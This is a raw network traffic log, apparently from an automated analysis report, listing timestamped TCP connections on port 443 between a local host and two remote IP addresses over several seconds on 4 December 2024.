                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.338002920 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.338030100 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.338572025 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.338577986 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.541105032 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.541675091 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.541692972 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.542427063 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.542433023 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.689954042 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.690637112 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.690665007 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.691132069 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.691137075 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.779717922 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.783732891 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.783951998 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.792996883 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.793031931 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.793046951 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.793051958 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.796030998 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.796071053 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.796130896 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.796288967 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.796295881 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.885668039 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.888909101 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.888969898 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.888982058 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.889031887 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.889091969 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.889117002 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.889132023 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.889137983 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.892061949 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.892103910 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.892201900 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.892357111 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.892368078 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.950283051 CET44349930159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.950661898 CET49930443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.951109886 CET49930443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.951121092 CET44349930159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.953011036 CET49930443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:45.953016996 CET44349930159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.002620935 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.005964994 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.006028891 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.006094933 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.006139040 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.006192923 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.006222963 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.006238937 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.006244898 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.009252071 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.009289026 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.009363890 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.009526014 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.009541988 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.147728920 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.150995016 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.151061058 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.157905102 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.157928944 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.157943964 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.157951117 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.163929939 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.163973093 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.164026022 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.164170980 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.164185047 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.840857983 CET44349930159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.841042995 CET49930443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.841074944 CET44349930159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.841125011 CET49930443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.841128111 CET44349930159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.841180086 CET49930443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.841339111 CET49930443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.841356039 CET44349930159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.842879057 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.842936993 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.843039989 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.843322992 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:46.843333960 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.067431927 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.068106890 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.068140984 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.068600893 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.068607092 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.519885063 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.522849083 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.522913933 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.524425030 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.535206079 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.535249949 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.535267115 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.535275936 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.535820007 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.535835981 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.536361933 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.536370039 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.540676117 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.540723085 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.540779114 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.541039944 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.541052103 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.685635090 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.689913988 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.689938068 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.697736025 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.697755098 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.805144072 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.845880032 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.875463963 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.875480890 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.876406908 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.876416922 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.966522932 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.969906092 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.969990969 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.970149994 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.970165014 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.970310926 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.970318079 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.974205971 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.974266052 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.974328995 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.975011110 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:47.975027084 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.021125078 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.021665096 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.021692991 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.022145987 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.022150993 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.139033079 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.142355919 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.142410040 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.142440081 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.142494917 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.142570972 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.142585993 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.142599106 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.142608881 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.145658016 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.145711899 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.145775080 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.145961046 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.145977020 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.256287098 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.260260105 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.260354996 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.260425091 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.260425091 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.260447979 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.260458946 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.263329029 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.263369083 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.263442039 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.263729095 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.263740063 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.300261021 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.300324917 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.300872087 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.300883055 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.302761078 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.302766085 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.568702936 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.571620941 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.571724892 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.571779013 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.571799040 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.571810007 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.571815968 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.574585915 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.574628115 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.574718952 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.575136900 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:48.575148106 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.188390970 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.188416004 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.188481092 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.188551903 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.188581944 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.188942909 CET49936443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.188958883 CET44349936159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.190928936 CET49942443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.190989017 CET44349942159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.191071033 CET49942443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.191342115 CET49942443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.191355944 CET44349942159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.397998095 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.398597002 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.398614883 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.399184942 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.399189949 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.703756094 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.704801083 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.704826117 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.705451965 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.705461025 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.858741999 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.862879992 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.862942934 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.863014936 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.863033056 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.863048077 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.863054991 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.866889954 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.866929054 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.867096901 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.867347956 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:49.867357016 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.008548975 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.009188890 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.009212971 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.009676933 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.009680986 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.146966934 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.150254011 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.150338888 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.150401115 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.150419950 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.150434017 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.150439978 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.153529882 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.153577089 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.153697968 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.153866053 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.153872967 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.302898884 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.303445101 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.303463936 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.303930998 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.303937912 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.470630884 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.473839045 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.473920107 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.491122007 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.491147995 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.491159916 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.491166115 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.497984886 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.498032093 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.498101950 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.498338938 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.498346090 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.642416000 CET44349942159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.642554998 CET49942443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.752388000 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.754808903 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.754887104 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.808334112 CET49942443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.808387041 CET44349942159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:50.811722994 CET49942443192.168.2.6159.69.102.165
